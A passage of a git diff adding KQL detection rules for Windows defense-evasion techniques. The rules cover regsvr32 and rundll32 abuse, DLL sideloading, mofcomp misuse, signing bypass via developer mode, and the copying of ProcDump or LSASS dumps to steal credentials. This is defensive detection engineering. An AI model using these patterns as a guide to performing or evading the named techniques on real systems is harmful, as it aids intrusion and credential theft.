VSS/VDS Provider as a COM+ application. Attackers can use this to install malicious DLLs for persistence and execution. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - Other VB scripts that leverage the same starting command line flags + +DeviceProcessEvents +| where ProcessCommandLine contains ".vbs -register " and ((FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("cscript.exe", "wscript.exe"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql new file mode 100644 index 00000000..cc96e8e1 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_regsvr32_commandline_flag_anomaly.kql @@ -0,0 +1,12 @@ +// Title: Potential Regsvr32 Commandline Flag Anomaly +// Author: Florian Roth (Nextron Systems) +// Date: 2019-07-13 +// Level: medium +// Description: Detects a potential command line flag anomaly related to "regsvr32" in which the "/i" flag is used without the "/n" which should be uncommon. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218.010 +// False Positives: +// - Administrator typo might cause some false positives + +DeviceProcessEvents +| where ((ProcessCommandLine contains " -i:" or ProcessCommandLine contains " /i:" or ProcessCommandLine contains " –i:" or ProcessCommandLine contains " —i:" or ProcessCommandLine contains " ―i:") and FolderPath endswith "\\regsvr32.exe") and (not(ProcessCommandLine contains " -n " or ProcessCommandLine contains " /n " or ProcessCommandLine contains " –n " or ProcessCommandLine contains " —n " or ProcessCommandLine contains " ―n ")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql new file mode 100644 index 00000000..c81f7dec --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_rundll32_execution_with_dll_stored_in_ads.kql @@ -0,0 +1,10 @@ +// Title: Potential Rundll32 Execution With DLL Stored In ADS +// Author: Harjot Singh, '@cyb3rjy0t' +// Date: 2023-01-21 +// Level: high +// Description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1564.004 + +DeviceProcessEvents +| where ProcessCommandLine matches regex "[Rr][Uu][Nn][Dd][Ll][Ll]32(\\.[Ee][Xx][Ee])? \\S+?\\w:\\S+?:" and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql new file mode 100644 index 00000000..6990e807 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_script_proxy_execution_via_cl_mutexverifiers_ps1.kql @@ -0,0 +1,10 @@ +// Title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 +// Author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 +// Date: 2022-05-21 +// Level: medium +// Description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1216 + +DeviceProcessEvents +| where (ProcessCommandLine contains " -nologo -windowstyle minimized -file " and FolderPath endswith "\\powershell.exe" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\Windows\\Temp\\") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql new file mode 100644 index 00000000..76a864cd --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features.kql @@ -0,0 +1,10 @@ +// Title: Potential Signing Bypass Via Windows Developer Features +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-11 +// Level: high +// Description: Detects when a user enable developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "TurnOnDeveloperFeatures" and (FolderPath endswith "\\SystemSettingsAdminFlows.exe" or ProcessVersionInfoOriginalFileName =~ "SystemSettingsAdminFlows.EXE") and (ProcessCommandLine contains "DeveloperUnlock" or ProcessCommandLine contains "EnableSideloading") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql new file mode 100644 index 00000000..7b5c2d96 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_signing_bypass_via_windows_developer_features_registry.kql @@ -0,0 +1,10 @@ +// Title: Potential Signing Bypass Via Windows Developer Features - Registry +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-01-12 +// Level: high +// Description: Detects when the enablement of developer features such as "Developer Mode" or "Application Sideloading". Which allows the user to install untrusted packages. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\AppModelUnlock" or RegistryKey endswith "\\Policies\\Microsoft\\Windows\\Appx*") and (RegistryKey endswith "\\AllowAllTrustedApps" or RegistryKey endswith "\\AllowDevelopmentWithoutDevLicense") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql new file mode 100644 index 00000000..95e665ee --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_suspicious_mofcomp_execution.kql @@ -0,0 +1,13 @@ +// Title: Potential Suspicious Mofcomp Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-12 +// Level: high +// Description: Detects execution of the "mofcomp" utility as a child of a suspicious shell or script running utility or by having a suspicious path in the commandline. +The "mofcomp" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository. +Attackers abuse this utility to install malicious MOF scripts + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 + +DeviceProcessEvents +| where (((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") or (ProcessCommandLine contains "\\AppData\\Local\\Temp" or ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\WINDOWS\\Temp\\" or ProcessCommandLine contains "%temp%" or ProcessCommandLine contains "%tmp%" or ProcessCommandLine contains "%appdata%")) and (FolderPath endswith "\\mofcomp.exe" or ProcessVersionInfoOriginalFileName =~ "mofcomp.exe")) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe"))) and (not((ProcessCommandLine contains "C:\\Windows\\TEMP\\" and ProcessCommandLine endswith ".mof"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql new file mode 100644 index 00000000..79ad5087 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_suspicious_windows_feature_enabled_proccreation.kql @@ -0,0 +1,14 @@ +// Title: Potential Suspicious Windows Feature Enabled - ProcCreation +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-29 +// Level: medium +// Description: Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. +Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Legitimate usage of the features listed in the rule. + +DeviceProcessEvents +| where (ProcessCommandLine contains "Enable-WindowsOptionalFeature" and ProcessCommandLine contains "-Online" and ProcessCommandLine contains "-FeatureName") and (ProcessCommandLine contains "TelnetServer" or ProcessCommandLine contains "Internet-Explorer-Optional-amd64" or ProcessCommandLine contains "TFTP" or ProcessCommandLine contains "SMB1Protocol" or ProcessCommandLine contains "Client-ProjFS" or ProcessCommandLine contains "Microsoft-Windows-Subsystem-Linux") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql new file mode 100644 index 00000000..b1432564 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_sysinternals_procdump_evasion.kql @@ -0,0 +1,12 @@ +// Title: Potential SysInternals ProcDump Evasion +// Author: Florian Roth (Nextron Systems) +// Date: 2022-01-11 +// Level: high +// Description: Detects uses of the SysInternals ProcDump utility in which ProcDump or its output get renamed, or a dump file is moved or copied to a different name +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036, attack.t1003.001, attack.credential-access +// False Positives: +// - False positives are expected in cases in which ProcDump just gets copied to a different directory without any renaming + +DeviceProcessEvents +| where (ProcessCommandLine contains "copy procdump" or ProcessCommandLine contains "move procdump") or ((ProcessCommandLine contains "2.dmp" or ProcessCommandLine contains "lsass" or ProcessCommandLine contains "out.dmp") and (ProcessCommandLine contains "copy " and ProcessCommandLine contains ".dmp ")) or (ProcessCommandLine contains "copy lsass.exe_" or ProcessCommandLine contains "move lsass.exe_") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql new file mode 100644 index 00000000..c953acae --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_system_dll_sideloading_from_non_system_locations.kql @@ -0,0 +1,12 @@ +// Title: Potential System DLL Sideloading From Non System Locations +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-14 +// Level: high +// Description: Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64, etc.). +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.persistence, attack.privilege-escalation, attack.t1574.001 +// False Positives: +// - Legitimate applications loading their own versions of the DLLs mentioned in this rule + +DeviceImageLoadEvents +| where (FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\activeds.dll" or FolderPath endswith "\\adsldpc.dll" or FolderPath endswith "\\aepic.dll" or FolderPath endswith "\\apphelp.dll" or FolderPath endswith "\\applicationframe.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith "\\appxalluserstore.dll" or FolderPath endswith "\\appxdeploymentclient.dll" or FolderPath endswith "\\archiveint.dll" or FolderPath endswith "\\atl.dll" or FolderPath endswith "\\audioses.dll" or FolderPath endswith "\\auditpolcore.dll" or FolderPath endswith "\\authfwcfg.dll" or FolderPath endswith "\\authz.dll" or FolderPath endswith "\\avrt.dll" or FolderPath endswith "\\batmeter.dll" or FolderPath endswith "\\bcd.dll" or FolderPath endswith "\\bcp47langs.dll" or FolderPath endswith "\\bcp47mrm.dll" or FolderPath endswith "\\bcrypt.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cabinet.dll" or FolderPath endswith "\\cabview.dll" or FolderPath endswith "\\certcli.dll" or FolderPath endswith "\\certenroll.dll" or FolderPath endswith "\\cfgmgr32.dll" or FolderPath endswith "\\cldapi.dll" or FolderPath endswith "\\clipc.dll" or FolderPath endswith "\\clusapi.dll" or FolderPath endswith "\\cmpbk32.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\coloradapterclient.dll" or FolderPath endswith "\\colorui.dll" or FolderPath endswith "\\comdlg32.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\connect.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coremessaging.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\credui.dll" or FolderPath endswith "\\cryptbase.dll" or FolderPath endswith "\\cryptdll.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\cryptui.dll" or FolderPath endswith "\\cryptxml.dll" or FolderPath endswith "\\cscapi.dll" or FolderPath endswith "\\cscobj.dll" or FolderPath endswith "\\cscui.dll" or FolderPath endswith "\\d2d1.dll" or FolderPath endswith "\\d3d10_1.dll" or FolderPath endswith "\\d3d10_1core.dll" or FolderPath endswith "\\d3d10.dll" or FolderPath endswith "\\d3d10core.dll" or FolderPath endswith "\\d3d10warp.dll" or FolderPath endswith "\\d3d11.dll" or FolderPath endswith "\\d3d12.dll" or FolderPath endswith "\\d3d9.dll" or FolderPath endswith "\\d3dx9_43.dll" or FolderPath endswith "\\dataexchange.dll" or FolderPath endswith "\\davclnt.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dcomp.dll" or FolderPath endswith "\\defragproxy.dll" or FolderPath endswith "\\desktopshellext.dll" or FolderPath endswith "\\deviceassociation.dll" or FolderPath endswith "\\devicecredential.dll" or FolderPath endswith "\\devicepairing.dll" or FolderPath endswith "\\devobj.dll" or FolderPath endswith "\\devrtl.dll" or FolderPath endswith "\\dhcpcmonitor.dll" or FolderPath endswith "\\dhcpcsvc.dll" or FolderPath endswith "\\dhcpcsvc6.dll" or FolderPath endswith "\\directmanipulation.dll" or FolderPath endswith "\\dismapi.dll" or FolderPath endswith "\\dismcore.dll" or FolderPath endswith "\\dmcfgutils.dll" or FolderPath endswith "\\dmcmnutils.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\eappcfg.dll" or FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sensapi.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\shfolder.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\tapi32.dll" or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\textshaping.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winscard.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsdapi.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wbemcomn.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll") and (not(((FolderPath endswith "\\version.dll" and FolderPath startswith "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") or (FolderPath endswith "\\d3dx9_43.dll" and FolderPath startswith "C:\\Program Files\\WindowsApps\\Microsoft.DirectXRuntime_") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\" or FolderPath contains "C:\\Windows\\SyChpe32\\")))) and (not((((FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl") and FolderPath startswith "C:\\Program Files\\Arsenal-Image-Mounter-") or FolderPath startswith "C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or (FolderPath endswith "\\PolicyManager.dll" and (FolderPath startswith "C:\\Program Files\\CheckPoint\\" or FolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\CheckPoint\\")) or (FolderPath startswith "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program 